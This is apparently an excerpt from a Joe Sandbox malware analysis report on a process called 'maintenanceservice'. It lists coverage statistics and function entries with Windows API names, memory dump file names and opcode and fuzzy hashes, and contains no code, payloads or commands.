                                                                                                                                                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                    Total number of Nodes:62
                                                                                                                                                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:4

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.2201416509.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_c00000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID:

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.2201416509.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_c00000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9fe3603a21fe6eb21bf1ff4052916b0d94510ca9861d5506b769434941bcff23
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 98ad4f1ecaba1b1ea26a62891c6d47ab910c8725483cf31499e5227f5de8182e
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8411530618F098FEB689729855C33B36D1EB9D310F6801ABD026CB1E2DA358E05DF56

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.2201416509.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_c00000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 96fdb80a4e04a5b53f4da7f875e67c34da90f6c78b99a65a1a1d8d1e6302e742
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 760f94599755da194dd29375a27335f1873d2ba13cc992e410e8a54c8ea46f33
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89F0F020A1CF0587EF2C833A895933B62C2E79D320FA40B5FC137C90E4DA248B01DE49

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.2201416509.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_c00000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 931fd701415f3896c39c52e9b81a295d2f4ff08a3d7171daaf0110dae3e0420a
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3BB01200529F8B7BD01513310A4C12B09806E4AB34D751FEE8F730A9D2D9040E04EF2C

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.2201416509.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_c00000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 1284135714-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 29f62f963c95ac517e6bcef111a3f20b72b523033f0a3d3134a0fb5cf338cfeb
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c955c7768020edb3d775754c7aa1ae957f516f6bf3db9d18962a2a84bb93b72c
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7721A531B2DE848FDB6A931944952B726A2F799324F58038BD096CB1D2D9284F05FE46

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.2201416509.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_c00000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: ef1744d48b1c56f0ecf6fc0211e3bfd52babcc0db8986298552e3dcb9ca73336
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: abeeb7420c1f47a5a155fc40ccd1a1890ae2ccf5a29964df3ea308a91953a94f
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 98F0F93450DB418FCE76871990504766BA0BF92700B59C1DED4D7C79E2CE149E4BD352

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.2201416509.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_c00000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: b8f326f9a84bd97911fb77614b6f3e103d574849e0710ed2c47c4b91ae146028
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4BF0B43450DA41CBCA35870984406362BA0BBA2700F6CC19DD5E6CB9E2CF24EF8FE752

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE ref: 00C0830B
                                                                                                                                                                                                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE ref: 00C08369
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000C.00000002.2201416509.0000000000C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_12_2_c00000_maintenanceservice.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandleInformationToken
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 3954737543-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5b9d1d2bae53b32a953845262fbc65bf2b703c0d6b129ca21c6772cfc0ea5f4f
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 30F0903440DA41CBCA758A19844057527A07FA2750B6CC15DD4E6CB9E2CE24EF8BE762